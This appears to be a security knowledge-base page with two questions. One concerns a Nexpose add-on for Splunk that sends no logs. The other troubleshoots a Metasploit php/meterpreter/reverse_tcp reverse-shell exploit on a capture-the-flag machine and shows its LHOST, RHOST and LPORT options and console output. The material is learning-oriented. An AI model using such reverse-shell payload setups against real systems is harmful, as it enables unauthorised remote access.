Knowledge Base

Questions

0

Rapid7 Nexpose TA Add-on for Splunk not working.

Hi, I'm trying to integrate Splunk with Nexpose using the TA Add-on, but it is not sending the logs. I have already set up everything as described, but it still does not work. I have the data input added on the forwarder and the account set up. These are the logs that I get from the TA-Rapid7_nexpose.log:

2018-09-10 14:48:57,905 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 14:48:58,005 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 14:48:58,006 INFO nx_logger:38 - Listing the fields for the set up screen...
2018-09-10 14:48:58,198 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 14:48:58,307 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:33,181 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:33,311 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:33,311 INFO nx_logger:38 - Listing the fields for the set up screen...
2018-09-10 15:02:33,511 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:33,609 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:33,725 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:33,836 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:33,837 INFO nx_logger:38 - Listing the fields for the set up screen...
2018-09-10 15:02:34,036 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:34,138 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:34,249 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:34,355 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:34,356 INFO nx_logger:38 - Listing the fields for the set up screen...
2018-09-10 15:02:34,543 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:34,643 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:34,743 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:34,841 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:34,841 INFO nx_logger:38 - Saving changes made on configuration screen...
2018-09-10 15:02:34,937 INFO nx_logger:38 - Sucessfully retrieved stored config for Nexpose.
2018-09-10 15:02:34,953 INFO nx_logger:38 - Password retrieved.
2018-09-10 15:02:35,110 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:35,111 INFO nx_logger:38 - Listing the fields for the set up screen...
2018-09-10 15:02:35,300 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:35,428 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:35,429 INFO nx_logger:38 - Listing the fields for the set up screen...
2018-09-10 15:02:35,622 INFO nx_logger:38 - Executing nexpose_setup.py
2018-09-10 15:02:35,726 INFO nx_logger:38 - Executing nexpose_setup.py

I would like to see if there is a way to see more logs and troubleshoot this. Thanks.

Ernesto M.

Posted by Ernesto Melendez 3 months ago

0

Can't open a Meterpreter Session by using a php/meterpreter/reverse_tcp payload

Hi, I'm learning to use Metasploit on a CTF machine that is publicly accessible over OpenVPN. I cannot get a reverse shell using Metasploit, where I'm very confident it should work; people in the forum confirm this. I'm running a Kali VirtualBox VM on a Windows 7 host on a laptop. I can ping and have turned off Windows Firewall. I also tried to install everything fresh on a desktop PC on Windows 10 with a fresh Kali VM. Did you experience similar problems or do you have any hint for me?

My ifconfig:

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
        inet 10.x.x.x netmask 255.255.255.0
        ...
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
        inet 127.0.0.1 netmask 255.0.0.0
        ...
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
        inet 10.y.y.y netmask 255.255.254.0 destination 10.y.y.y
        ...

I know from the forum that I should use the tun0 IP. Only one time did I have a Meterpreter session. It timed out. But now I cannot get a new session, even though all parameters are the same. I use the tun interface. What could be the problem in your opinion?

I tried to exploit multiple times. I did set TARGET and set PAYLOAD and set LHOST again. I reset the target machine multiple times, but no luck: no session. But the same worked, only once. I cannot understand this.

Current status:

msf exploit(exploit) > exploit

[*] Started reverse TCP handler on 10.y.y.y:4444
[*] Exploit completed, but no session was created.

msf exploit(exploit) > show options

Module options (exploit):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /                yes       Path to target webapp
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    targetIP         yes       The target address
   RPORT    80               yes       The target port (TCP)
   SRVHOST  10.y.y.y         yes       Callback host for accepting connections
   SRVPORT  9000             yes       Port to listen for the debugger
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.y.y.y         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   0   Automatic

There must be something else to set up. E.g., there is a remark for LHOST: “an interface may be specified”. Should I make: “setg interface tun0”? Or should I somehow clean up my Metasploit?

Thanks

Posted by Roman Graf 3 months ago